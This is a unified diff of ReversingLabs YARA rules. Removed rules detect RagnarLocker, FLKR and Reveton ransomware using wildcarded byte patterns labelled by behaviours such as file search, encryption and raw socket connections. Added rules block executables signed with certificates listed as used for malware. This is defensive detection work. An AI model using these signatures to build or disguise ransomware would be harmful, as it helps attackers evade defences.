?? - ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D - ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D - 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? - 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 8D 4D - ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B C8 E8 ?? ?? ?? ?? 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? 51 8D 4D ?? E8 ?? - ?? ?? ?? 8D 55 ?? 89 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? - ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Shulan Hou" and pe.signatures[i].serial=="74:70:2d:ff:5d:40:56:b8:47:d0:09:a2:26:5f:b1:b3" and 1469664000<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_353B1Cf7866Ee0B0Acdd532D0Bb1A220 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "20b95b80-94a9-51c3-9c6c-2a0ef75b0c0b" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15972-L15988" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "aa8f0fe1517134b6e562c2accc46420a4f0afd77c3a7bbe98d551c54e68ed4c7" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($kill_processes_call) and ($kill_processes) and ($enum_resources) and ( all of ($search_files_*)) and ( all of ($encrypt_files_p*)) and ($enum_resources_call) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Network Freak Limited" and pe.signatures[i].serial=="35:3b:1c:f7:86:6e:e0:b0:ac:dd:53:2d:0b:b1:a2:20" and 1558915200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Ragnarlocker : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_093Ff2870Fa33Eaf47259457Ee58C2E0 : INFO FILE { meta: - description = "Yara rule that detects RagnarLocker ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "3bc3765a-f1f8-59bc-bbe8-6821654b334f" - date = "2020-07-15" - modified = "2020-07-15" + id = "3fd458e6-bf5a-51f3-9b46-344e9f8e0ffe" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.RagnarLocker.yara#L1-L108" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "398f0e5e003f87edf90cdea718be6b10470df317214d00db4dc6c4cccc5b6748" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15990-L16006" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1aafe547b8645f07498bac6f0ffd6d5aefbac160aa7a6fb8d1d891e70701ce99" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "RagnarLocker" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? 33 C0 B9 ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 8B 75 ?? 57 - 8D BD ?? ?? ?? ?? F3 AB 8B 3D ?? ?? ?? ?? 39 45 ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 8D - 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 - ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF D3 - } - $find_files_p2 = { - 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? - ?? 83 FB ?? 75 ?? C7 45 ?? ?? ?? ?? ?? 33 F6 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? FF 74 B5 ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? - ?? 46 83 FE ?? 7C ?? 33 C0 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 - 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - 50 FF 75 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 - FF D6 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 50 FF D6 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF D6 6A ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? - ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? - ?? ?? 8B 45 ?? 8B 1D ?? ?? ?? ?? 8B 75 ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 - 56 FF D3 - } - $find_files_p3 = { - 33 F6 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 90 FF 74 B5 ?? - 53 FF D7 85 C0 74 ?? 46 83 FE ?? 72 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? - 8B 45 ?? 8B 75 ?? 8D 8D ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? E9 - ?? ?? ?? ?? 5F 5E 32 C0 5B 8B E5 5D C3 FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E B0 ?? 5B 8B - E5 5D C3 - } - $encrypt_files_p1 = { - 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - 83 C4 ?? 68 ?? ?? ?? ?? 50 FF D7 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D7 56 8B 35 ?? ?? - ?? ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? 50 FF D6 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 50 68 ?? ?? ?? ?? FF D6 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8B F0 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? - ?? ?? 8B F8 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? 56 8D 85 ?? ?? ?? - ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 - } - $encrypt_files_p2 = { - 8D 45 ?? 50 57 68 ?? ?? ?? ?? 56 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? - 57 50 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? - 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? 8B 35 ?? ?? ?? - ?? 8D 4D ?? 6A ?? 51 FF 75 ?? FF 75 ?? 50 FF D6 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 68 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 - C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 50 8D 85 ?? ?? ?? ?? - 50 FF 75 ?? FF D6 8B 45 ?? 50 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? - ?? ?? ?? FF D0 FF 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BF ?? ?? - ?? ?? 89 45 ?? 8D 57 ?? 8B CF D3 E8 A8 ?? 0F 84 ?? ?? ?? ?? 8D 47 ?? C7 45 ?? ?? ?? - ?? ?? 66 89 45 ?? 33 F6 33 C0 50 50 50 50 50 68 ?? ?? ?? ?? 50 66 89 45 ?? 8D 45 ?? - 50 FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? - ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? - ?? 66 8B 85 ?? ?? ?? ?? 66 3B 45 ?? 75 ?? 66 8B 85 ?? ?? ?? ?? 66 3B 45 ?? B8 ?? ?? - ?? ?? 0F 44 F0 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? - ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? - ?? ?? ?? 83 EF ?? 8B 45 ?? 0F 89 ?? ?? ?? ?? 0F 57 C0 C7 85 - } - $encrypt_files_p3 = { - 0F 29 85 ?? ?? ?? ?? 0F 29 85 ?? ?? ?? ?? 0F 29 85 ?? ?? ?? ?? 0F 29 85 ?? ?? ?? ?? - 0F 29 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 68 - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 68 - ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? - ?? ?? B8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 6A ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 - FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? - 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 - C0 74 ?? FF 75 ?? 8B 35 ?? ?? ?? ?? FF D6 FF 75 ?? FF D6 6A ?? FF 15 - } - condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AEEPZ Limited" and pe.signatures[i].serial=="09:3f:f2:87:0f:a3:3e:af:47:25:94:57:ee:58:c2:e0" and 1503532800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_FLKR : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_719C17A823839Dca813Ee85888B3B39A : INFO FILE { meta: - description = "Yara rule that detects FLKR ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "7f3abcd0-8dfa-5914-9ad0-566c16c2e2ab" - date = "2020-07-15" - modified = "2020-07-15" + id = "ca5b9ec0-2c46-50db-bc47-b3c6c61e990e" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.FLKR.yara#L1-L71" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4ab00ba82baceec9899556d3a774ec08c83c10930cec194e18e3b4e16ebacb58" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16008-L16024" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a160ada48048e11632082e7538459554d77d31539e53709cd897f3c454af8236" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "FLKR" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $search_and_encrypt_p1 = { - 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 56 57 8B BC 24 ?? - ?? ?? ?? 57 89 7C 24 ?? FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 89 44 - 24 ?? FF D5 8D 44 24 ?? 50 57 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? - ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 51 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 8D 54 24 ?? 52 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 8D 4C 24 ?? 51 - 57 C6 04 07 ?? FF D5 F6 44 24 ?? ?? 0F 84 ?? ?? ?? ?? 8D 5C 24 ?? E8 ?? ?? ?? ?? 84 - C0 0F 85 ?? ?? ?? ?? 8A 0F 33 D2 84 C9 74 ?? BE ?? ?? ?? ?? 8B C7 2B F7 88 0C 06 8A - 48 ?? 40 42 84 C9 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 82 ?? ?? ?? ?? ?? C6 82 ?? - ?? ?? ?? ?? FF D5 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 - 74 ?? 56 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 - ?? 68 ?? ?? ?? ?? 57 FF D5 57 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 C0 38 44 24 ?? 74 - } - $search_and_encrypt_p2 = { - 40 80 7C 04 ?? ?? 75 ?? 8A 4C 04 ?? 80 F9 ?? 75 ?? 80 7C 04 ?? ?? 75 ?? 80 7C 04 ?? - ?? 75 ?? 80 7C 04 ?? ?? 74 ?? 80 F9 ?? 75 ?? B3 ?? 38 5C 04 ?? 75 ?? 80 7C 04 ?? ?? - 75 ?? 80 7C 04 ?? ?? 75 ?? 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 05 ?? ?? ?? ?? E9 ?? - ?? ?? ?? FF 05 ?? ?? ?? ?? E9 ?? ?? ?? ?? B3 ?? B2 ?? 80 F9 ?? 75 ?? 38 5C 04 ?? 75 - ?? 80 7C 04 ?? ?? 75 ?? 38 5C 04 ?? 75 ?? 32 D2 80 F9 ?? 75 ?? 80 7C 04 ?? ?? 75 ?? - 80 7C 04 ?? ?? 75 ?? 80 7C 04 ?? ?? 75 ?? 32 D2 80 F9 ?? 75 ?? 80 7C 04 ?? ?? 75 ?? - 80 7C 04 ?? ?? 75 ?? 80 7C 04 ?? ?? 0F 84 ?? ?? ?? ?? 84 D2 0F 84 ?? ?? ?? ?? 8A 0F - 33 D2 84 C9 74 ?? 8D B4 24 ?? ?? ?? ?? 8B C7 2B F7 8D A4 24 ?? ?? ?? ?? 88 0C 06 8A - 48 ?? 40 42 84 C9 75 ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 0F B6 - 05 ?? ?? ?? ?? C6 84 14 ?? ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 8B 15 - ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 33 C0 6A ?? 89 8C 24 ?? ?? ?? ?? 89 94 24 ?? ?? ?? - ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 68 ?? ?? ?? ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 0D ?? - ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B E8 A1 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 8B 0D ?? ?? ?? - ?? 89 84 24 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 66 8B 15 ?? ?? ?? - ?? 89 8C 24 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 8D 74 24 ?? 89 6C 24 ?? 66 89 - } - $search_and_encrypt_p3 = { - 94 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 51 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? - 52 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 - E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 56 - 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 - 8D 84 24 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A - ?? 51 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 - ?? 56 E8 ?? ?? ?? ?? 8B 7C 24 ?? 83 C4 ?? FF 05 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 - FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 2B F0 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 03 - C6 50 8D 8C 24 ?? ?? ?? ?? 51 8B D1 52 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF - 15 ?? ?? ?? ?? 85 C0 75 ?? FF 05 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 55 E8 ?? ?? - ?? ?? 8B 2D ?? ?? ?? ?? 83 C4 ?? 8B 74 24 ?? 8D 4C 24 ?? 51 56 FF 15 ?? ?? ?? ?? 85 - C0 0F 85 ?? ?? ?? ?? 56 FF 15 - } - condition: - uint16(0)==0x5A4D and ( all of ($search_and_encrypt_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yuanyuan Zhang" and pe.signatures[i].serial=="71:9c:17:a8:23:83:9d:ca:81:3e:e8:58:88:b3:b3:9a" and 1479686400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Reveton : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_6Dc86Ebf5863568E2237B2D89582D705 : INFO FILE { meta: - description = "Yara rule that detects Reveton ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "14446b94-cd57-5930-b0af-b21091b61f68" - date = "2020-07-15" - modified = "2020-07-15" + id = "24741dc7-6252-5964-a69f-bef4b2dfe1a7" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Reveton.yara#L1-L118" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2d316c558cdb5591788ef89c6e20327882a118f2928f4a31fb5b8b3083931ac5" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16026-L16042" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f24cdf890bd0b51a83ca333c37bc22068ab1f7e7ef36b36d94a133773097bd37" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Reveton" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $http_connection_1 = { - C6 45 ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? - ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8B C3 E8 ?? ?? ?? ?? 50 8B 45 - ?? 50 E8 ?? ?? ?? ?? 8B D8 85 DB 74 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C0 - 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 06 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 50 68 - ?? ?? ?? ?? 8B 45 ?? 50 53 E8 ?? ?? ?? ?? 8B 55 ?? 8B 06 8B 4D ?? E8 ?? ?? ?? ?? 83 - 7D ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 - ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B 45 ?? 50 E8 - } - $raw_socket_connection_1_1 = { - 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 4D - ?? 89 55 ?? 8B F0 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 DB 8D 45 ?? BA ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 8B F8 85 FF 0F 8E ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B CF E8 - ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 - } - $raw_socket_connection_1_2 = { - C6 85 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 80 BD ?? ?? ?? - ?? ?? 74 ?? 33 C0 EB ?? B0 ?? 84 C0 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? - ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? E9 - ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? FE C8 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? 66 C7 85 ?? ?? ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? FE C8 74 ?? 2C ?? 74 - ?? E9 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? - ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 95 - ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? E8 - } - $raw_socket_connection_1_3 = { - 66 89 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F B6 BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 - ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CF - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 - C0 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 